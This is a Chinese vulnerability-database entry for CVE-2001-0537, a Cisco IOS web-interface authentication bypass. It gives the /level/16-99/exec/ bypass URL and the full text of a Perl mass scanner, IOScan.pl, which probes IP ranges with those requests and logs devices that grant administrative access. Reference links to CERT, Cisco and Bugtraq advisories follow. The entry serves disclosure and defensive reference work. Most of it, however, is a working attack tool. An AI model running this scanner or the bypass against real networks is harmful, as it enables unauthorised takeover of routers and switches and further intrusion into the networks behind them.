Cisco IOS Web配置接口安全认证可被绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106247 漏洞类型 授权问题
发布时间 2001-03-07 更新时间 2005-05-02
CVE编号 CVE-2001-0537 CNNVD-ID CNNVD-200107-164
漏洞平台 Hardware CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/20977
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-164
|漏洞详情
IOS是Cisco公司开发的路由器固件。IOS支持很多Cisoco设备(包括路由器和交换机)。在CiscoIOS11.3开始的版本存在一个安全问题,如果它开放了Web管理接口,将允许任意远程攻击者获取该设备的完全的管理权限。攻击者只需要构造一个如下的URL:http:///level/xx/exec/....这里的xx是一个从16-99之间的整数。对于不同的设备,这个数值可能是不同的,但是攻击者仅需要测试84次即可找到正确的数值。这个问题可能导致远程用户获取完全的管理权限,并进一步对网络进行渗透,也可能造成拒绝服务攻击漏洞。
|漏洞EXP
# source: http://www.securityfocus.com/bid/2936/info
#   
# IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
#   
# It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
#   
# This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
# 

#!/usr/bin/perl
#
# Bulk Scanner for the Cisco IOS HTTP Configuration Arbitrary
# Administrative Access Vulnerability
# Found: 06-27-01 - Bugtraq ID: 2936
# Written by hypoclear on 07-03-01
#
# usage: ./IOScan.pl <start ip> <end ip>
# Note: start and end ip must be a Class B or C network
# example: ./IOScan 192.168.0.0 192.168.255.255
#
# hypoclear - hypoclear@jungle.net - http://hypoclear.cjb.net
# This and all of my programs fall under my disclaimer, which
# can be found at: http://hypoclear.cjb.net/hypodisclaim.txt

use IO::Socket; 

die "\nusage: $0 <start ip> <end ip>
Note:  start and end ip must be a Class B or C network
ex:   ./IOScan 192.168.0.0 192.168.255.255\n\n" unless @ARGV > 0;
$num = 16; $ipcount = 0; $vuln = 0;

if (defined $ARGV[1])
 { $currentIP = $ARGV[0]; $endIP = $ARGV[1];
   while(1)
    { @CURIP = split(/\./,$currentIP);
      if (($CURIP[2] > 255) && ($CURIP[3] > 255))
       { scanEnd();
       }
      print "Scanning $currentIP\n";
      scan($currentIP);
      if ($currentIP eq $endIP)
       { scanEnd();
       }
      if ($CURIP[3] < 255)
       { $CURIP[3]++;
       }
      else
       { $CURIP[2]++;
         $CURIP[3]=0;
       }
      $currentIP = "";
      foreach $item (@CURIP)
        { $currentIP .= "$item.";
        }
      $currentIP =~ s/\.$//;
      $ipcount++;
     }
 }


sub scan
  { while ($num <100)
      { $IP = $_[0];
        sender("GET /level/$num/exec/- HTTP/1.0\n\n");
        if ($webRecv =~ /200 ok/)
         { $vuln++;
           open(OUT,">>ios.out") || die "Can't write to file";
           print OUT "$IP is Vulnerable\n";
           close(OUT);
           $num = 101;
         }
        $num++;
      }
     $num = 16;
  }


sub sender
  { $sendsock = IO::Socket::INET -> new(Proto     => 'tcp',
                                        PeerAddr  => $IP,
                                        PeerPort  => 80,
                                        Type      => SOCK_STREAM,
                                        Timeout   => 1);
        unless($sendsock){die "Can't connect to $ARGV[0]"}
   $sendsock->autoflush(1);

   $sendsock -> send($_[0]);
   $webRecv = ""; while(<$sendsock>){$webRecv .= $_} $webRecv =~ s/\n//g;
   close $sendsock;
  }


sub scanEnd
  { print "\nScanned $ipcount ip addresses, $vuln addresses found vulnerable.\n";
    if ($vuln > 0) {print "Check ios.out for vulnerable addresses.";}
    die "\n";
  }
|参考资料

来源:CERT/CCAdvisory:CA-2001-14
名称:CA-2001-14
链接:http://www.cert.org/advisories/CA-2001-14.html
来源:BID
名称:2936
链接:http://www.securityfocus.com/bid/2936
来源:CISCO
名称:20010627IOSHTTPauthorizationvulnerability
链接:http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
来源:XF
名称:cisco-ios-admin-access(6749)
链接:http://xforce.iss.net/static/6749.php
来源:BUGTRAQ
名称:20010702CiscodeviceHTTPexploit...
链接:http://www.securityfocus.com/archive/1/Pine.LNX.3.96.1010702134611.22995B-100000@Lib-Vai.lib.asu.edu
来源:BUGTRAQ
名称:20010629Re:CiscoSecurityAdvisory:IOSHTTPauthorizationvulnerability
链接:http://www.securityfocus.com/archive/1/4.3.2.7.2.20010629095801.0c3e6a70@brussels.cisco.com
来源:BUGTRAQ
名称:20010702ios-http-auth.sh
链接:http://www.securityfocus.com/archive/1/20010703011650.60515.qmail@web14910.mail.yahoo.com
来源:BUGTRAQ
名称:20010702CiscoIOSHTTPConfigurationExploit
链接:http://www.securityfocus.com/archive/1/1601227034.20010702112207@olympos.org
来源:OSVDB
名称:578
链接:http://www.osvdb.org/578
来源:CIAC
名称:L-1